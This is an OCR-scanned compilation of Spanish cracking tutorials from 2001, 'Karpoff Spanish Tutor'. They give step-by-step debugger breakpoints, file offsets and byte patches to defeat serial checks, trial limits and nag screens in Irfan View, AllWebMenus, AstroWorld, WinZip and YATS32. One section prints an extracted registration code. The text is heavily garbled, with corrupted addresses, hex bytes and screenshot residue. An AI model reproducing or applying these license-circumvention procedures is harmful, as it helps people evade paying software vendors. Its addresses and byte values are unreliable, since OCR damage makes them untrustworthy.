016F:004C5DBC 004C5DD4 004C5A70 004C58E0 004C56D4 .]L.pZL..XL..VL. 
016F:004C5DCC ADO00010 0000000B  6D77736D 000067783 ........ mswmsQg.. 
016F:004C5DDC A0000034 TFBDABBO 004C76E0 00000001 Artea da ELIT a 
016F:004C5DEC 004C57F4  004C5930 004C5E5C  004C5E14 .WL.OYL.A%L.."L. v 
si lo que coloreee de verde parece ser nuestro numero de serie que insertamos ..... jejejeje creo que vamos bien ........ despues 
de ahi vamos traceando con F10 hasta llegar a esta parte del codigo : 

a MSVBVM50!__ vbaStrMove+001A PROT32- 
0167:0F01F8F4 EBFO JMP 0FO1F8E6 a 
MSVBVM50!__ vbaStrCmp $ 
0167:0FO1F8F6 FF742408 PUSH DWORD PTR [ESP+08] 

0167:0FO01F8FA FF742408 PUSH DWORD PTR [ESP+08] 

0167:0F01F8FE  6A00 PUSH 00 

0167:0F01F900  E85E3CFEFF CALL MSVBVM50!__vbaStrComp 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 
Irfan View v 3.33 


Name / Serial 


Buscar un serial valido 


Principiante 


http://www.irfanview.com 


Softice 3x 
Profesor_X FECHA: 15/04/2001 


INTRODUCCION 


Hola Amigos otro programa mas que analizamos, en este tutorial veremos como encontrar un numero de 
serie valido para el Irfan View v 3.33 de la empresa Irfan Skiljan que se especializa en 
desarrollar utilerias para windows algunas muy buenas ........ como podran ver 
aumente una nueva seccion que se llama : VALORACION DEL SOFTWARE en la cual 
pondremos la calificacion que se merece segun mi punto de vista, tomando en cuenta 
los siguientes parametros: 


1. sistema de proteccion 


2. Funcionalidad 
3. Calidad en programación 


AL ATAKE 


Comentario del Programa 


e El show de hoy estara a cargo de un programa que a mi parecer es bueno para quienes gustan de un solo programa 
con el cual puedan ver todas sus imagenes no importando el formato que sea, tiene muy buenas caracteristicas el 
Irfan View v 3.33 , pruebenlo y veran que vale la pena, quiero aclarar que hay mejores aplicaciones para 
visualización de imagenes. 


Objetivos 
1. Buscar un numero de serie 


Manos a la Obra 


Bueno amigos empezemos con este Taco de salchica en escabeche...!!!! J EJ EJ EJ EJ ..... lo primero que haremos es 
analizar el programa para ver si esta empakado y en que lenguaje fue hecho, con la herramienta llamada Lenguaje 2000 y 
nos mostrara esto: 


> CiProgram Files UirtanViewVi_view32.cxe 


mmmm....como podemos ver esta hecho en visual C++ y esta empacado con el paker mas conocido de todos el Aspack v 
1.08, jjejjejje ok ahora abramos el programa y busquemos si tiene una opcion para insertar un serial...y despues de un 
rato encontramos esa opcion..en el menu Help >Registration y nos aparece esta ventanita : 


itanView - Registration 


SL 
a a 


en la cual insertaremos un nombre y numero de serie y damos click en OK y nos manda un mensaje como este: 


| IrfanYiew 


OK! ahora vamos y reiniciamos la Pcera con el Soft Ice, y ejecutamos el Irfan View v 3.33 y vamos al dialogo de 
registro e insertamos unos datos, pero antes de dar OK vamos y damos CONTROL D y ponemos un Break POint en 
MESSAGEBOXA, damos CONTROL D otra vez y ahora si damos click en OK y saltamos inmediatamente a el 
softice, damos F12 una sola vez y caemos en esta parte del codigo: 


016F:0073EF54 35 33 32 31 31 30 38 30-38 00 44 00 00 00 40 00  532110808.D...t.” 
016F:0073EF64 00 00 00 00 98 8C 44 00-AO0 F5 73 00 AO F6 73 00. ...... Dis Sacó 
016F:0073EF74 BC F8 73 00 2C 89 00 00-D4 F8 73 00 08 F9 73 00. ..S.,..... SimiSuV 
016F:0073EF84 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00. c.occcccccoo...... v 
7 O O o PROT32- 


0167:00448C92 50 PUSH EAX 

0167:00448C93 E8088EFEFF CALL 00431AA0 
0167:00448C98 83C408 ADD ESP, 08 
0167:00448C9B  85C0 TEST EAX, EAX 
0167:00448C9D 752D JNZ 00448ccc 
0167:00448C9F  8BODC4FF4C00 MOV ECX, [004CFF'C4] 
0167:00448CA5 8B15A0284E00 MOV EDX, [004E28A0] 
0167:00448CAB 6830200000 PUSH 00002030 
0167:00448CB0 68003A4E00 PUSH 004E3A00 
0167:00448CB5 51 PUSH ECX 

0167:00448CB6 52 PUSH EDX 

0167:00448CB7 FF15C8D34A00 CALL [USER32 !MessageBoxA] 
0167:00448CBD  33C0 XOR EAX,EAX  CAEMOS AQUI 
0167:00448CBF  5F POP EDI 


bueno amigos cuando damos F12 una sola vez caemos en la direccion de memoria 00448CBD ok una vez ahi suvimos diez 
lineas y podemos ver una CALL seguido de TEST mmmmm... interesate , vamos y borramos todos los break Points y ponemos uno nuevo 
en 00448C93 y damos CONTROL D e insertamos un numero y nombre falso y damos click en OK y saltamos 
directamente a esa direccion de memoria damos una sola vez F10 y caemos en 00448C98 y damos D EDX y hechamos 
un vistazo a la ventana de datos, nos aparecen unos numeros extraños 532110808 OK!!!! los apuntamos en un papel y 


IrfanYiew 


O 


[LEA 


ahora si podemos decir ....... PROGRAMA CRACKEADO ....... 
nO0TAS 
ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking......... Soy humano y 


cometo errores, si encuentras uno házmelo saber OK. PROFESOR X 


UNA COSA MUY IMPORTANTE SI QUIERES QUE TUS TUTORIALES APARESCAN EN LA COMPILACION DE TUTORIALES 2000 
MANDAMELOS A MI EMAIL...... 


Saludos 
+ [DeK_0iN] 
e Act MAgO 
. ¡TeD 
e SIR DREAM 
e. POTHEAD 
. VluGo 
e CrKViz 
e Txeli 
e Kuato_Thor 
e CODE_MEX 
e Metamorfer 
e Txotxo 


e Raziel 


e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www.tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:// www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 


Allwebmenus V1.2 


Name / Serial 


Buscar un serial valido 


Principiante 

http://www.Likno.com 

Softice, W32dsm89 , Regmonitor , Editor Hex. 

SiLvEr StOrM FECHA: 


INTRODUCCION 


15/04/2001 


Hola de nuevo, despues de varios dias sin hacer un tut aqui les va otro ..aqui vamos de nuevo pero esta vez 
vamos a parchar el prerama para que el mismo nos de el serial.. Jejej fijense el mismo programa se va 
registrar solito.. que tonto ..ya son 11 tutoriales gracias a todos Uds...(por tener paciencia de leerelos), espero 


que lo entiendan y les sea util. Recuerden que este tutorial esta hecho con fines netamente educativos 
si les interesa este Programa COMPRENLO. 


AL ATAKE 
Comentario del Programa 
e El programa que vamos a registrar les genera menus para intrucirlos en un html file. 
Objetivos 
1. Simular registrarse 
Manos a la Obra 


Primero instalamos nuestro programa , luego lo revisamos con File Inspector, este lo omito los detalles pues en todos los tutoriales anteriores lo hemos hecho, creo 
que ya no necesito decirlo de nuevo. lo unico que debemos saber es que esta hecho en Visual Basic. podriamos intentar buscar el serial con Numega smartcheck, pero 
esta vez no lo haremos, pues lo parchearemos. 


Ok... jeje aqui comienza la aventura. 


Abrimos nuestro Objetivo... y . tratamos de registrarlo. nada nuevo.. Help.. Register..etc... 


El programa nos da un error cuando ponemos cualquier numero... The password......... etcetcectect. 

ok. abrimos W32dsm89 y buscamos nuestro objetivo. 

Recuerden de hacer una copia del executable.... y trabajar sobre la copia a la hora de hacer las modificaciones. 
Luego buscamos el string "The password...." 


veremos algo asi: 


Subimos un poco en el codigo .. 
Aquí el programa ya viene con el error de codigo.. Seguimos todas las referencias.. vemos que mas arriba hay un JNE ... 


esto es interesante verdad?..Asi que lo primero que hacemos es cambiar esta instrucción a si no es igual no ejecute osea de 736d 
Cambiamos a 746d para decirle que salte a la direccion 5330fb . 


Para cambiar esto usamos un editor hexadecimal.. recuerden que para ver el offset deben ver en la parte de debajo de w32dasm donde dice 
COoffset 0013308C ... la h no se toma en cuenta pues quiere decir que el numero esta en hexadecimal 


Ejecutamos el REGMONITOR para ver que pasa con el registro. y luego nuestrop programa modificado... 
Intentamos Registrarlo y si, cuando metemos cualquier numero el programa nos da las gracias por registrarlo.. 


Pensamos que eso estodo, pero lamentablemente cuando vemos en about nos dice unregistered copy.. JEjej la cosa no era tan facil pero bueno 
seguimos viendo. lo interesante de este paso es que el programa crea las claves dentro del registro de windows. 


Si cuando le damos enter al crear la clave, no vamos aregmonitor.y analizamos vemos que el programa crea las claves dentro del registro. 
Estas claves las vamos a utilizar mas tarde, pues sabemos que son falsas. 


A BusKar El Zeryal 


Ok . vamos a seguir traceando a ver por que nos da este eror. 
Se acuerdan que en el registro guardaba un string como este: 


SetValueEx HKCUWSoftwarelVB and VBA Program SettingslAllWebMenuslSettingsipwd SUCCESS "123456789" 

Vamos a buscar ese strin.. preguntan para que, pues bien.. la primera logica que se me ocurre es que cuando el sistema arranca o le das about 
el compara lo que hay dentro de ese strin contra la formula de generacion que tiene, si es igual pasa ,si no da que no esta registrado.. bueno 
vamos a tracear esta instrucion , primero la buscamos como ref. 


PWD 


[52 URSoft W32D asm Ver 8.93 Program Disassembler¿Debugger MES 
Disassembler Project Debug Search Goto Execute Text Functions HexData Refs Help 


* Possible StringData Ref from Code 0b3 ->"pud" 
| 


:0048EAA7 68FC1D4100 push 00411DFC 
20048EAAE SB4D90 mov ecx, dword ptr [ebp-70] 
:0048EAB1 8294594 mov dword ptr [ebp-6C], eax 


* Possible StringData Ref from Code 0bj ->"Settings" 
| 


:0048EAB4 68C81D4100 push 00411DC8 

:D0485EAB9 8942404 mov dword ptr [edx+04], ecx 
:004S8EABC SB4DE4 mov ecx, dword ptr [ebp-1C] 
:DO04S8EABF 51 push ecx 

:D048EACO 894208 mov dword ptr [edx+08], eax 
:D048EAC3 8B4598 mov eax, dword ptr [ebp-68] 
:0048EAC6 89420C mov dword ptr [edx+0C], eax 
:0048EAC9 FFD? call edi 


* Reference To: MSVEVMG6O.  vbaStrMove, Ord: 0000h 
| 


:O048EACB 8B359C124000 mov esi, dword ptr [0040129C] 
:0048EAD]1 SEDO mov edx, eax 

:0048EAD3 B918705300 mov ecx, 00537018 

:004S8EADS FFD6 call esi 


:004S5EADA SD4DE4 lea ecx, dword ptr [ebp-1C] 


JejSi buscamos hacia abajo .. no conseguimos ninguna call quiere decir que cualquier proceso se esta ejecutando ahí mismo, pero si seguimos 
bajando conseguimos un condicional... jeje si vemos encima de ese jne hace una referencia a visualbasic _vbastrecmp osea un string compare.. 
ok nos paramos sobre ella y le damos al boton de jump to. 

Por cierto el jnz que les comento esta en la linea.. :0048EB00 

Y caemos en el sitio de validacion. 

Seguimos bajando por el codigo y encontramos una Call en la linea :0048EEE1 .. esta call es donde el compara el codigo que genero para esta 
instalacion .. genera el bueno y se trae un valor 

Si seguimos bajando vemos como el programa empieza a hacer una serie de operaciones .. 

Seguimos bajando, vemos que no hay mas call, pero en la linea :0048EF45 hay otro condicional.. 

Jeje aquí si creo que es..... perfecto vamos a cambiarlo por jne 

Osea vamos a cambiar el string 0F8434040000 POR 0F8534400000 vieron que solo cambie el 84 por 85 el resto sigue igual... ahh.. El offset 
es SEF45 

Y probamos--- se acuerdan que ya en el registro esta la clave.. 

Entramos en nuestra version modivicada y nos vamos al about.. 


JEje Programa Registrado 


Jjeje que simpatico si Uds. Borran el contenido de pwd o el PID del registro y entran de nuevo el mismo se registra con otro password y pid 
diferente.. 
Tonto verdad... 


nO0TAS 


Cualquier error por favor pido disculpas, y si lo ven por favor me lo dicen, para corregirlo.. recuerden que soy humano y por lo tanto no soy 
perfecto.. (:-)) y no quiero serlo tampoco... 


ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking........ 


Saludos 


Profesor_x 
KuaTo 
TurboP 
Txotxo 
[DeK_OiN] 


e Toda la gente de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


SiLvEr StOrM 


SiLvEr_ StOrM_ 2001 Ehotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


Programa: AstroWorld 2000 v 4.1.0.1 (Spanish Edition) 
PROTECCION: Limitacion de tiempo € Nag Screen 
Objetivo: Quitar Tiempo Limite y Nag Screen 
Descripcion: 
Dificultad: Principiante 
DOWNLOAD : http://www.astroworld.com 
e Soft Ice 
A e Hex Work Shop v 3.0 


e RVA Converter v 1.1 


CRACKER: Profesor_X FECHA: 15/04/2001 


INTRODUCCION 


otra vez .. jejeje... con otro tuto más espero que les guste, le toca el banquillo de los acusados a la aplicación 
llamada Astroworld v 4.1.0.1 la cual sirve para poder crear tus cartas astrologicas ya sea actual o de cuando 
naciste, con estas cartas astrologicas podras saber si naciste para el cracking o no.. jejejjeje ... 


AL ATAKE 


Comentario del Programa 


e El Astroworld v 4.1.0.1 tiene muchisimas opciones para la creación de : 
1. Cartas astrologicas 
2. Cartas Planetarias 
3. Horoscopos 
4. etc. etc. 


la verdad es bueno este programa para los que gustan de estos temas, a mi no me gustan estos temas, pero ahi les va el 
tuto para los que esten interesados.... 


Objetivos 


1. Quitar el Tiempo Limite y la NAg Screen 


Manos a la Obra 


empezemos con el MEN] URGUE, lo primero que hacemos es analizar el programa para ver si esta empakado y en que lengueje fue 
hecho, para eso usamos el File Inspector v 4.2 y nos muestra lo siguiente: 


18, file insPEctor v3.5 - ViPÉ RIK-FoR] 


ES, : iz | 
Y : : e 


como podemos ver no esta empakado y esta hecho en Visual C++v 5.0, mmmm interesante, ahora lo siguiente sera analizar el 
programa ...lo ejecutamos y nos aparece una ventana como esta: 


NO 
rd Ms 2000 | 


Y) 
Á 


) 
rid Int 


software astrológico 
para Microsoft Windows 


Terminado 


seguida de la ventana principal del programa ... jejejjeje ... como pueden ver nos muestra dos botones , si damos click en 
SIGUIENTE entramos al programa, ok! lo importante aqui es quitar ese tiempo limite y la NAg screen, para eso tenemos que hacer 
uso de nuestro querido y gran ponderado SOFTICE ok! lo primero que hacemos es ejecutar de nuevo el ASTROWORLD y dejamos 
que aparesca la ventana que nos avisa que se termino el periodo de prueba, una vez ahi vamos y damos CONTROL D el cual nos 
manda a el SICE y ponemos el comando TASK el cual nos mostrara la siguiente información : 


TaskName SS: SP StackTop StackBot  StackLow TaskDB hQueue Events 


Ins90e0 * 0000:0000 00699000 006A0000 515E 513F 0000 


Seekrep 0000:0000 0064B000 00650000 519E 514F 0000 


Dreamwea 0000:0000 00C7A000 00C80000 121E 48F7 0000 
Dahelp 0000:0000 0056D000 00570000 4AD6 0000 0000 
Astrowor 0000:0000 0085C000 00860000 10F6 OFBF 0000 
Wmiexe 0000:0000 0056D000 00570000 22FE 0000 0000 
Msmsgs 0000:0000 006FB000 00700000 3416 231F 0000 
Winampa 0000:0000 0063E000 00640000 351E 3467 0000 
Flash32 0000:0000 00B3D000 00B40000 361E 3537 0000 
Avgcc32 0000:0000 0065B000 00660000 36C6 354F 0000 
Promon 0000:0000 0063E000 00640000 3776 36F7 0000 
Systray 0000:0000 0063D000 00640000 244E 373F 0000 
Taskmon 0000:0000 0063E000 00640000 2356 23DF 0000 


despues de eso podemos ver que encontramos en ejecución el ASTROWORLD, despues de eso seguimos en el SOFT ICE y 
damos el comando: 


HWND ASTROWOR 


y nos aparece lo siguiente: 


0698 (1) OFBF 32 ASTROWORL +32770 (Dialog) 13D7:00000B38 
069C (2) OFBF 32 ASTROWORL Edit 13D7:00000B38 
06A0 (2) OFBF 32 ASTROWORL Edit 13D7:00000B38 
06A4 (2) OFBF 32 ASTROWORL Button 13D7:00000B38 
06A8 (2) OFBF 32 ASTROWORL Button 13D7:00000B38 
06AC (2) OFBF 32 ASTROWORL Button 13D7:00000B38 
06B0 (2) OFBF 32 ASTROWORL Button 13D7:00000B38 
06B4 (2) OFBF 32 ASTROWORL Static 13D7:00000B38 
06B8 (2) OFBF 32 ASTROWORL Static 13D7:00000B38 


ya sabemos ahora cual es el HANDLE de la ventana del astroworld que es 0698 , ahora seguimos en el softice y ponemos 


BMSG 0698 WM_DESTROY 


y damos enter , despues damos control d y salimos del SOFTICE y ahora si damos click en el boton de SIGUIENTE y 

saltamos directamente al SOFTICE en el cual damos F12 varias veces hasta caer en el codigo del ASTROWORLD al caer en 
el codigo , empesamos a dar F10 hasta pasar dos RET y inmediatamente que pasamos el segundo RET caemos en la siguiente 
parte del codigo: 


0167: 


0167: 


0167: 


0167: 


0167: 


0167: 


00411EC9 


00411ECD 


00411ED3 


00411ED8 


00411EDB 


00411EDD 


C645FCO1 MOV 
8D8DDOFCFEFFF LEA 
E8065B1000 CALL 
83F803 CMP 
1533 JNZ 


C785ECF9FFFFO3000000MOV 


BYTE PTR [EBP-04],01 


ECX, [EBP-0330] 


005179DE 


EAX,03  <---——caemos aqui 


00411rF10 


DWORD PTR [EBP+FFFFF9EC],00000003 


bueno amigos creo que esta super claro, despues del segundo ret, caemos una linea abajo de la call que genera la ventana y 
hace la comprobación del time, jejeee, ahora lo que tenemos que hacer es eliminar esa CALL en la dirección de memoria 
411ED3 , ok entonces abrimos el ejecutable del ASTROWORLD en el editor hexadecimal y ahora tenemos que sacar su 
offset de esa direccion de memoria, como lo hacemos bueno pues muy facil para no estar esperando a que se desensamble , 
vamos y usamos la grandiosa herramienta hecha por LaZaRuS el RVA Converter v 1.1 en el cual en el menu de file 
seleccionamos LOAD y cargamos el ejecutable del ASTROWORLD y ponemos como aparece en la ventana : 


!HVA Converter 


en la opcion de RVA ponemos la direccion de memoria en la cual se encuentra esa call y nos da como offset 11ED3, una vez 
con el offsett vamos al editor hezadecimal y vamos a ese offset y cambiamos: 


J0011EC8 
30011ED6 [HE 


por 


D0011EC8|00C6 45FC 018D 8DDO FCFF F 


D0C6 45FC 018D 8DDO FCFF F 


83F8 0375 3307 85EC F9FF FFO3 H. . Ae, con... 
MON 1 A RRA LONA NAPA ASEO NNAN SANA FPER FEFA 


PROGRAMA CRACKEADO.... MMMM 


nO0TAS 


ESPERO les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking......... Soy humano y cometo 
errores, si encuentras uno házmelo saber OK. PROFESOR_X 


UNA COSA MUY IMPORTANTE SI QUIERES QUE TUS TUTORIALES APARESCAN EN LA COMPILACION DE TUTORIALES 2000 
MANDAMELOS A MI EMAIL...... 


Saludos 


e [DeK_O0iN ] 

e Act MAg0 (nEw tNt crAK teAM mEMBER) cCONGRATULATIONS!!! 
e Txeli 

e Kuato_Thor 

e Txotxo 

e Turbop 


e Karpoff<font COLOR 


Karpoff Spanish Tutor 2001 
Programa: Winzip v8.0 (3105) 


PROTECCION: Serial 

Objetivo: Encontrar un Serial Valido 

Descripcion: 

Dificultad: Principiante 

DOWNLOAD : http://www.any on internet 

Herramientas: Softice v3x 

CRACKER: SiLvEr StOrM FECHA: 15/04/2001 


INTRODUCCION 


JeJe como siempre esto de hacer tutoriales es entretenido, aunque mas divertido es entender los diferentes 
esquemas de generacion de claves que usan las casas de software, Aqui vamos de nuevo con otro tutorial , 
sigo acendiendo, ya he alcanzado la suma de 9 tutoriales.. gracias a todos Uds...(por tener paciencia de 
leerwelos), espero que lo entiendan y les sea util. Recuerden que este tutorial esta hecho con fines 


netamente educativos si les interesa este Programa COMPRENLO. 


Por cierto muchas gracias a mi amigo KuaTo. 


AL ATAKErr 


Comentario del Programa 


e El programa que vamos a Busacr es un programa que creo que un 99% de los usuarios de computadoras usan o 
por lo menos los deberia usar.. es un compactador de archivo para generar archivos comprimidos (buenisimo) 


Objetivos 
1. Busacr el Serial Valido 
Manos a la Obra 


Primero instalamos nuestro programa y lo ejecutamos 


THANK YOU FOR TRYING WINZIP! 
This is a fully functional unregistered version for evaluation use only. 
The registered version does not display this notice. 


You can order the registered version online, by phone, or by mail. 
immediate online delivery is available from www. winzip.com. 


Wiew Evaluation License Enter Registration Code... 


l understand that | may use W'inZip only for evaluation 
purposes, subject to the terms of the Evaluation License, and 
that any other use requires payment of the registration fee. 


Presionamos Enter Registration Code... 


y veremos algo como esto: 


Register W'inZip XK] 


lf you paid the WinZip registration fee: 


If you paid the WinZip registration fee and received a registration number from WinZip 
Computing or an authorized reseller, please enter your name and registration number here 
EXACTLY as they appear in the instructions, or click "Help' for additional informatior. 


If you have not yet paid the WinZip registration fee: 


If you downloaded an evaluation version of W'inZip, or if you received this version ofWéinZip 
ona disk or CD, with a book, or with other hardware or software, and pou have not paid the 
WinZip registration fee, you are licensed to use WinZip for evaluation purposes only. Click 
"Continue Unregistered", or click "Help" for additional information. 


Name: SiLvwEr StOrhd 
Registration $: hr 23456789 


Cancel Continue Unregistered Help 


Llenamos los spacios con nuestros datos: en mi casolo pongo como ven en esta pantalla 
Prueben uds. con sus propios datos. 


Y presionamos Ok. 


WinZip 


O Incomplete or incorrect information. 


Ok.. Seguimos con nuetro infalible plan de conseguir el serial 


A BusKar El Zeryal 


Para la busqueda de serial Presionamos ACEPTAR y volvemos con los datos aneriores.. 


Antes de darle Ok -.------ Presionamos Control D y abrimos Softice (sice). Ponemos un Breakpiont en 
GETDLGITEMTEXTA y salimos de Sice con Control D. 


Presionamos Ok. 


Slce se abre... ESTA VEZ NO NOS IMPORTA LA PRIMERA VEZ PUES SOLO REVISA EL NOMBRE 


Presionamos Control D y SICE se cerrara y aparecera de nuevo aqui. 


015F:00407F8F CALL [USER32!GetDlgltemTextA] " 
015F:00407F95 PUSH ESTI ---—— ooo Caemos AQui.. 
015F:00407F96 CALL 0043F89A 

015F:00407F9B PUSH ESI 

015F:00407F9C CALL 0043F8C3 

015F:00407FA1 CMP BYTE PTR [0048CD78],00 
015F:00407FA8 POP ECX 

015F:00407FA9 POP ECX 

015F:00407FAA JZ 00408005 

015F:00407FAC CMP BYTE PTR [0048CDA4],00 


015F:00407FB3 JZ 00408005 


015F:00407FB5 CALL 004079D3 == ==-=--- ESTA CALL ES EL IMPORTANTE .. AQUI GENERA EL 
CODE 

015F:00407FBA TEST EAX,EAX == COMPARA EL CODIGO... 

015F:00407FBC JZ 004080053 ----------=-==---- SALTA SINO ES IGUAL ..... 

015F:00407FBE PUSH EDI 


015F:00407FBF MOV EDI,0047FFA4 


Ok.. Desabilitamos TODOS los BREAKPIONTS... escribimos BC * 


Y ponemos uno en ESA CALL. 
escribimos BPX 004079D5 

Y salimos de Sice --Control D 
Datos Iguales y Presionamos OK. 


Sice Abre de nuevo.. 


015F:004079D2 RET 0004 

015F:004079D5 PUSH EBP === ooo====-- Caemos aqui... 
015F:004079D6 MOV EBP,ESP 

015F:004079D8 SUB ESP,00000208 
015F:004079DE PUSH EBX 

015F:004079DF PUSH ESI 

015F:004079E0 XOR ESLESI 

015F:004079E2 CMP BYTE PTR [0048CD78],00 
015F:004079E9 PUSH EDI 

015F:004079EA JZ 00407A8A 

015F:004079F0 LEA EAX,[EBP-14] v 


015F:004079F3 PUSH EAX <> v 


Presionamos 58 veces F10 hasta caer aqui. 


0167:0079F2E8 43 36 30 31 31 36 45 30-00 01 00 00 00 00 56 FS C60116EO0......V.2 
0167:0079F2F8 01 00 02 00 0B 00 EA 82-17 23 42 00 46 163C0A ......... AB.F<A 
0167:0079F308 00 00 28 83 A3 0E 7F 04-00 00 09 00 00 00 09 00 ..(...82127;......... 
0167:0079F318 02 00 90 01 02 00 47 11-38 83 17 0C 57 17 BC 01 ......G.8...W... 
0167:0079F328 C1 01 38 83 1E 0C 57 17-0E 01 90 01 0B 00 17 27 ..8...W........ 
0167:0079F338 5A 83 El 28 01 00 00 00-5F 22 0B 00 9001 1C 58 Z..(...._".....Xv 
0167:0079F348 67 01 00 00 00 00 02 00-64 F3 4F 4B 1C 58 02.00 g.......d.OK.X..v 
A PROT32- 
015F:00407A9E MOV ESI,0048CDA4 " 

015F:00407AA3 LEA EAX.[EBP-0140] " 


015F:00407AA9 PUSH ESI 


> Nuestro Serial Valido 


015F:00407AAA PUSH EAX > Aqui Adentro Encerraron NUESTRO SERIALVALIDO ... ? eax 


015F:00407AAB CALL 004692D0 
015F:00407AB0 ADD ESP,10 
015F:00407AB3 NEG EAX 
015F:00407AB5 SBB EAX,EAX 
015F:00407AB7 INC EAX 
015F:00407AB8 MOV [00489FDC],EAX 
015F:00407ABD JNZ 00407B27 v 


015F:00407ABF LEA EAX,[EBP-0140] < > v 


Caundo estemos sobre esta linea tipeamos ? eax y anotamos ese numerito que aparece.. 
Borramos los bp ... bc * 

y Control D para salir de Sice. 

Ponemos el numerito que conseguimos.. y listo Programa Registrado. 


Reaistration Information 


SiLwEr StOrb 
C60116E0 


Press OK to confirm that this is pour correct registration information and 
that you have obtained it from WinZip Computing, Inc. or an authorized 
reseller. Otherwise press Retry or Cancel. 


Retry Cancel | 


nO0TAS 


ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking........ 


Saludos 


Profesor_x 
KuaTo 
TurboP 
Txotxo 


e Toda la gente de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


SiLvEr StOrM 


SiLvEr_StOrM_2001 Ohotmail.com 
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Karpoff Spanish Tutor 


22 Planta... Cosmética y maquillaje :0) 


PROTECCION: Name / Serial, Limitacion de Tiempo 
Objetivo: Simular estar registrados 
Dificultad: Novato 
. SoftlIce, file insPEctor, Proc Dump, W32dasm, Editor Hexadecimal, 
Herramientas: 
eXeScope, Resource Hacker 
CRACKER: Caos reptante FECHA: 20/03/2001 
INTRODUCCION 


Este es mi cuarto tutorial, y si alguien ha leído los tres anteriores, se habrá dado cuenta de que mi manera 
preferida de crackear un programa es obtener el serial number que nos permita registrarnos, o, si es posible, 
elaborar un generador de números de serie. Esto es muy limpio, ya que así evitamos manipular el programa 
original y además tiene la ventaja de que, con un poco de suerte, el número nos va a servir para registrar 
alguna versión posterior del programa. Por el contrario, si parcheamos por ejemplo la versión 1.0 de un 
programa, lo más seguro es que si aparece la versión 1.01, el parche ya no nos sirva. Sin embargo, muchas 
veces, bien porque es demasiado complicado obtener el número de registro, o bien porque el registro no se 
hace a base de entrar un número, nos vemos obligados a parchear el programa para que se comporte como 
si realmente estuviera registrado a nuestro nombre. Á eso me refiero al hablar de "cosmética y maquillaje" 
:0) Ahora vamos a ver tres ejemplos de lo que se puede hacer en estos casos. Estos programas han sido 
elegidos, en parte por azar y en parte porque la utilidad o calidad del programa (bajo mi punto de vista) no 
justifican la inversión de tiempo necesaria para aplicarles un "tratamiento" más conveniente. 


AL ATAKE 


Programa: YATS32 Versión 8.1 (Build 15) 


Este programa sincroniza la hora de nuestro ordenador con unos 


Descripcion: ¿ ; 
P relojes que deben ser la hostia. 


DOWNLOAD: http://www.dillobits.com/ 


Cuando arrancamos el programa, nos saluda una "preciosa" nag que nos dice que tenemos 30 días por delante para 
registrarnos o dejar de utilizarlo, y nos da la posibilidad de introducir el serial number correspondiente o de evaluar 
el programa. En este caso, trataremos de parchearlo para que parezca registrado. 


About YATS32 


Lo primero que debemos hacer es utilizar el file insPEctor para saber con qué nos encontramos. Y nos encontramos 
con que el programa está compilado con Neolite 2.0. El siguiente paso lo daremos con el ProcDump. Ejecutaremos el 
ProcDump -> Unpacker -> Neolite2 y ya está. Salvamos el programa descomprimido como Yats.exe, e intentamos 
abrirlo con el W32Dasm. El resultado es: 


Volvemos al ProcDump y seguimos los pasos siguientes: PE Editor -> Choose Executable: Yats -> Sections, y 
vemos lo siguiente: 


Sections Editor 


00034000 00001000 OOO33EB0 00001000 Co0D00s0 
0000D 000 00035000 DODOCDE4 00035000 40000080 
00010594 00042000 000182BC 00042000 Co000040 
ODODEB50 OD0SF000 DODOESC8 00058000 40000040 


AAAACARA ARAS ARA PANA RA A AAAFA AAA PARANA 


A continuación, transcribo una parte de "Descabezando archivos ejecutables portables" de nuMIT_or donde se 
explica el significado de la numeración del campo Characteristics: 


El campo Characteristics indica las propiedades de la sección, es decir, si se trata de código objeto, de datos 
inicializados o no inicializados, si se puede escribir y leer sobre la sección, si es ejecutable, si es compartible, etc. 


PROCDUMP llama a este campo "CHARACTERISTICS". A continuación las equivalencias: 


- 000000020h __ Código. 

- 0O0000040h __Datos inicializados. 

- 000000080h __ Datos no inicializados. 

- 040000000h __ Sección cacheable. 

- 080000000h __ Sección paginable. 

- 100000000h __Sección compartida. 

- 200000000h _ Ejecutable. 

- 400000000h __Se puede leer. 

- 800000000h __Se puede escribir en la sección. 


Así pues, debemos cambiar el valor de la sección .text, CODOOOSO por un valor que nos permita acceder al código del 
programa, o mejor aún, un valor que nos dé "licencia para matar", como E0000020. (botón derecho -> Edit section) 
Sobre este tema, también es recomendable consultar "Cracking desde cero para súper newbies 8", un excelente 
trabajo de DeK_OIN. 


Ahora el W32Dasm nos revelará los secretillos del programa sin ningún problema. Podemos empezar por las 
referencias a "REGISTERED TO", "30 DAY EVALUATION", "EVALUATION PERIOD EXPIRED", las cuales 
nos conducirán al meollo de la cuestión. Si seguimos los pasos entre estas referencias tendremos a la vista el código 
que determina sí estamos registrados o no, y en este caso los días que nos quedan: 


* Possible Reference to String Resource ID=00604: comments Odillobits.com 


:0040125D 685C020000 push 0000025C 

:00401262 8D8E24020000 lea ecx, dword ptr [esi+00000224] 
:00401268 E8A2A30200 call 0042B60F 

:0040126D 391DC8AD4500 cmp dword ptr [0045ADC8], ebx 
:00401273 747C je 004012F1 


Mediante esta comparación, el programa determina si estamos registrados o no. Para lo que queremos hacer, será 
suficiente con "nopear" el salto, pero vamos a echar un vistazo al resto. 


